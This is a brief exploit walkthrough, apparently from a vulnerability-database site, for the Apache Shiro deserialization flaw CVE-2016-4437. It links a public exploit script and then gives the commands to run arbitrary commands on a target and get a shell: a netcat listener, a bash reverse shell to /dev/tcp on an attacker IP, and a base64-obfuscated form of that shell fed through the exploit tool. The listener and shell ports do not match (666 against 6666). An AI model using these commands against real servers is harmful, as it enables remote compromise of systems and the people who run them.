CVE-2016-4437_Shiro反序列化漏洞

# CVE-2016-4437 Shiro反序列化漏洞/ru

==POC==
https://github.com/insightglacier/Shiro_exploit

==Эксплуатация уязвимостей==

python3 shiro_exploit.py -t 3 -u http://192.168.2.147:8080 -p "touch a.txt"

==Команда была выполнена успешно.==

==Getshell==
Слушатель выполняет следующие команды:

nc -lvp 666

Машина-жертва выполняет следующую команду:

bash -i >& /dev/tcp/192.168.2.130/6666 0>&1
bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjIuMTMwLzY2NjYgMD4mMQ==}|{base64,-d}|{bash,-i}

python3 shiro_exploit.py -t 3 -u http://192.168.2.147:8080 -p "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjIuMTMwLzY2NjYgMD4mMQ==}|{base64,-d}|{bash,-i}"

文章版权归作者所有，未经允许请勿转载。

THE END

国内漏洞库

CVE-2016-4437_Shiro反序列化漏洞_ru

请登录后发表评论

1老外百万赏金猎人直播课录屏第三课、第四课

2基于Vue+Springboot+Flask+Pytorch的视频网站，深度学习部分使用Flask封装Pytorch代码接口

32022-2023韩顺平java课程

4老外百万赏金猎人直播课录屏第五课

5AI PPT 创作实战课+人人都是 prompt 工程师

6用友U8 Cloud ReleaseRepMngAction SQL注入 (CNVD-2024-33023)